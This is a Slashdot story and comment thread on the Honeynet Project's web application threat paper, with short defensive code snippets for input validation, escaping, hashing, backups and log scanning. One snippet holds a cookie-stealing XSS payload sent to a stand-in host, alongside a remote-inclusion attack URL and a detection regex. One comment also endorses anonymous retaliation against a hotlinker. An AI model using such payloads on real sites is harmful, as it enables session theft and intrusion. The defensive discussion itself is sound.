Posted
by
kdawson
on Sunday February 25, 2007 @11:08PM
from the spider-to-fly dept.

An anonymous reader sends us to a technical white paper written by the Honeynet Project & Research Alliance: Know Your Enemy: Web Application Threats. Based on analysis of malware collected by the project, the paper outlines a number of HTTP-based attacks against web applications and some ways of protecting Web servers. Included are code injection, remote code-inclusion, SQL injection, cross-site scripting, and exploitation of the PHPShell application.

Aesthetically speaking, it's not very pretty, and even one 5 MB image can be pretty devastating to a cable connection. And I doubt the ability of whatever image host it was to cache the image properly: you need the right headers to be sent, and so many people get these things wrong. There are also cases where people crash entire operating systems by using up all the video card's memory; see ha.ckers.org/imagecrash.html (WARNING: may crash your machine, though the latest version of IE is not affected).
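Getting those caching headers right mostly means sending a validator plus an explicit freshness lifetime. A minimal sketch in Python (function name and the one-day lifetime are my own choices, not from the article):

```python
from email.utils import formatdate

def image_cache_headers(mtime, max_age=86400):
    """Build the response headers an image host needs so browsers and
    proxies can cache correctly: Last-Modified as a validator, plus
    Cache-Control with an explicit max-age freshness lifetime."""
    return {
        "Cache-Control": f"public, max-age={max_age}",
        # HTTP dates must be RFC 1123 format in GMT.
        "Last-Modified": formatdate(mtime, usegmt=True),
    }
```

With these set, a revalidating client gets a cheap 304 instead of refetching the whole 5 MB file.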

So I decided to teach this jackass a lesson and use a rewrite rule that turns those image requests into humiliating messages about himself. [...] If you're going to do something like this, don't do it from your real account.

What makes you think he did? For all you know, he goaded you into attacking somebody he doesn't like.

Well, don't use "nobody", use a non-shared account with a name like "www". And chroot won't help you with a SQL injection attack, especially if the scripts log in as "sa" (don't laugh, I've seen it done).

If it's the apps being attacked and not the server, the first line of defense is to sanitize user input.
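The first line of defense amounts to never splicing user input into a query string. A sketch of the parameterized-query approach, in Python with sqlite3 for illustration (the apps under discussion are PHP; table and values here are made up):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, pw TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def login(name, pw):
    # Parameterized query: user input is bound as data, never
    # concatenated into the SQL text, so ' OR '1'='1 stays inert.
    cur = conn.execute(
        "SELECT COUNT(*) FROM users WHERE name = ? AND pw = ?", (name, pw))
    return cur.fetchone()[0] == 1
```

The classic injection string `' OR '1'='1` simply fails to match as a password, where a string-concatenated query would have let it through.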

Or maybe, like the science articles, the subject flies over most heads. Just because it's called "news for nerds" doesn't mean that the majority have a nerd's understanding. Now the YRO section is more illustrative of what Slashdot has become.

It might have gone over non-web-developers' heads, I'm not arguing over that (I'd still expect the chair/Soviet Russia/does-it-run-Linux/imagine-a-Beowulf-cluster/whatever memes to be here, though). But for the other part of /.'ers who develop web apps, this stuff is rather obvious. The same old issues:

- register_globals - 'nuff said
- SQL injection (rather crappy explanation, and an extremely basic one here - there are FAR better articles on this!)
- people not validating input before they use it
- XSS
- etc.
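On the XSS item: the fix is just as old as the issue, escape anything user-supplied before it reaches the browser. A one-liner sketch in Python (the payload string is an invented example):

```python
import html

# A typical cookie-stealing payload a user might submit as a "comment".
comment = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Escaping turns the markup into inert text: the browser displays the
# angle brackets instead of executing the script.
safe = html.escape(comment)
```

The same rule applies whichever templating layer you use: escape on output, every time, not just where you expect trouble.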

Based on the descriptions of the attacks in the article, it looks like your general attacker is some kiddie who wields Google like a broadsword. Sure, there were some attempts to recruit the honeypot into a botnet or set up a phishing site, but most of the attacks just overwrote the index page (with text from a tutorial, no less) or moved around in the file system. I didn't know the ratio of kiddies to people who know what they're doing was so out of whack.

The basic theme of this seems to be "patch! patch! patch!". A lot of the scripts they discussed (AWStats, phpBB, etc.) are ones where the people who use them don't have the expertise to dig into their code and fix problems themselves (or possibly even understand what the problems are).

The three rules of running a web app you didn't write:

1: Subscribe to the announcements mailing list

2: Apply patches immediately

3: Back-up your shit regularly, because even if you do 1 and 2, you might get hit and then you're going to need your backups.

Rule three is sort of universal for any webmaster, whatever they're running, even if they wrote it all themselves and have security certifications up the wazoo. Not running back-ups is about as wise as putting your 401k funds into lottery tickets.
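Rule three is easy to automate. A minimal sketch of a timestamped-snapshot script in Python (paths and naming are my own; a real setup would also dump the database and copy the archive off the server):

```python
import pathlib
import tarfile
import time

def backup(src_dir, dest_dir):
    """Snapshot a web app's document root into a timestamped tarball.
    Sketch only: rule-3 compliance also means database dumps and
    off-server copies, which this deliberately leaves out."""
    dest = pathlib.Path(dest_dir)
    dest.mkdir(parents=True, exist_ok=True)
    name = dest / time.strftime("site-%Y%m%d-%H%M%S.tar.gz")
    with tarfile.open(name, "w:gz") as tar:
        tar.add(src_dir, arcname=pathlib.Path(src_dir).name)
    return name
```

Drop something like this in cron and rule three takes care of itself, as long as you occasionally test that the archives actually restore.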

It's a good article for people who aren't focusing on security professionally. It shouldn't be news to anybody who keeps up with trends, though -- is anyone really still using register_globals?!

Michal Zalewski pointed out a cute hack some years ago. Search engine spiders have to follow links that end in queries, like "toparticle.php?page=1". Barring extraordinary and ultimately impossible care in the coding of the spiders, they could also follow URLs that include attack code after the question mark. In _Silence on the Wire_, he imagined a crook building a long list of links to potentially vulnerable systems, appending attack code to each, and leaving the list someplace where Googlebot and its colleagues will find it. Googlebot could twist the doorknob on 1.5 million PHPBB systems a lot faster than the crook possibly could.

As GP stated, you could publish on any webpage a list of links that contain malicious code in them. When Google, Yahoo, and other spiders crawl the links, *THEY* end up doing the attacking. That is rather dangerous, I'd say - it'd be very difficult to track down the person responsible, especially if the original webpage was posted on a zombie server.
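Since those attack strings ride in on ordinary GET requests, the defense on the application side is strict input validation: treat a query parameter as the narrow type you expect, never as free text. A sketch (function name, bounds, and example URLs are invented):

```python
def safe_page_param(raw):
    """Treat ?page=... strictly as a small positive integer; anything a
    crawler was tricked into appending (URLs, file paths, SQL) is
    rejected rather than echoed or evaluated."""
    try:
        page = int(raw)
    except (TypeError, ValueError):
        return 1  # fall back to a safe default, don't reflect the input
    return page if 1 <= page <= 10000 else 1
```

With this in place, `toparticle.php?page=http://evil.example/shell.txt?` degrades to page 1 instead of triggering a remote inclusion, no matter who follows the link.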

By The Web Application Security Consortium
"From a counter-intelligence perspective, standard honeypot/honeynet technologies have not borne much fruit in the way of web attack data. Web-based honeypots have not been as successful as OS-level or other honeypot applications (such as SMTP) due to the lack of their perceived value. Deploying an attractive honeypot web site is a complicated, time-consuming task. Other than a script kiddie probing for an easy defacement or an indiscriminate worm, you just won't get much traffic.
So the question is - How can we increase our traffic, and thus, our chances of obtaining valuable web attack reconnaissance?
This project will use one of the web attacker's most trusted tools against him - the open proxy server. Instead of being the target of the attacks, we opt to be used as a conduit of the attack data in order to gather our intelligence. By deploying multiple, specially configured open proxy servers (or proxypots), we aim to take a bird's-eye look at the types of malicious traffic that traverse these systems. The honeypot systems will conduct real-time analysis on the HTTP traffic to categorize the requests into threat classifications outlined by the Web Security Threat Classification and report all logging data to a centralized location."
http://www.webappsec.org/projects/honeypots/ [webappsec.org]

Take your eye off the ball and lose your server, it's as simple as that.

If you have a server with a lot of PHP applications running, you need to watch them all. I forgot about a CMS installation on my server that was being preserved for historical reasons (not even linked from the front page, but obviously visible to Google), and sure enough, it got exploited via a remote inclusion attack and was used for nefarious purposes for a while without being noticed.

Checking the logs, the definite path of attack was a Google search for a known vulnerable version of the CMS, followed by a Perl script to perform the hack. Clearly the vulnerable system goes into a shared database of known vulnerable systems, because to this day, despite the CMS being backed up and taken offline, my server gets attacked about once every 20 minutes by Perl scripts targeting that CMS.
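Those probes are easy to spot in an access log once you know the signature: a remote-inclusion attempt stuffs a full URL into a script parameter. A crude log filter as a sketch (regex and sample lines are my own invention, not from the article):

```python
import re

# Remote file inclusion probes typically embed a full URL after "=" in
# the query string, e.g. index.php?page=http://evil.example/id.txt?
RFI = re.compile(r"GET\s+\S*\?\S*=(?:https?|ftp)(?::|%3[Aa])", re.I)

def suspicious(lines):
    """Return the access-log lines that look like RFI probes."""
    return [line for line in lines if RFI.search(line)]

log = [
    '1.2.3.4 - - "GET /cms/index.php?page=about HTTP/1.1" 200',
    '5.6.7.8 - - "GET /cms/index.php?page=http://evil.example/id.txt? HTTP/1.1" 200',
]
```

Here `suspicious(log)` flags only the second line; piping yesterday's log through something like this is a cheap daily sanity check.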

I also regularly see bots automatically filling in registration forms with spam, and wikis getting referrer-spam comments added to them, or even their content changed by bots.

Looking after even a smallish webserver has proven to be a royal pain in the proverbial.

Regarding PHPShell, I'd hope most people hash their password in the config file rather than leaving it plain-text, and also hide it away somewhere non-obvious (maybe behind another level of protection to keep the webcrawlers from spotting it). But even with hashed passwords, logging in still sends a plaintext password, and is thus equally vulnerable to good old FTP and Telnet password sniffing. The Joomla extension that provides a plugin PHPShell is a worrying development, and I'm sure will lead to more PHPShell discoveries on servers.
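For the config-file side of that, a salted, stretched hash is the thing to store. A generic sketch in Python (PHPShell's actual scheme may differ; function names, the `salt$digest` format, and the round count are my own):

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None, rounds=100_000):
    """What goes in the config file: hex salt + PBKDF2 digest,
    never the plaintext password itself."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return salt.hex() + "$" + digest.hex()

def check_password(password, stored, rounds=100_000):
    """Recompute the digest with the stored salt and compare in
    constant time to avoid leaking information via timing."""
    salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), rounds)
    return hmac.compare_digest(candidate.hex(), digest_hex)
```

As the comment notes, this only protects the config file at rest; the login exchange itself still needs transport protection against sniffing.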

Really, the only way to avoid being compromised if you have a semi-busy site is to learn how to compromise websites yourself and try it on your own site (it also teaches you what to look out for in the logs). This, in combination with regular patching, seems to be the best way to stay one step ahead.

And yes, keeping the evidence is good - it gets stupid kids kicked off their ISPs when you send them the proof. ;) Now *that* is some satisfying karma. :)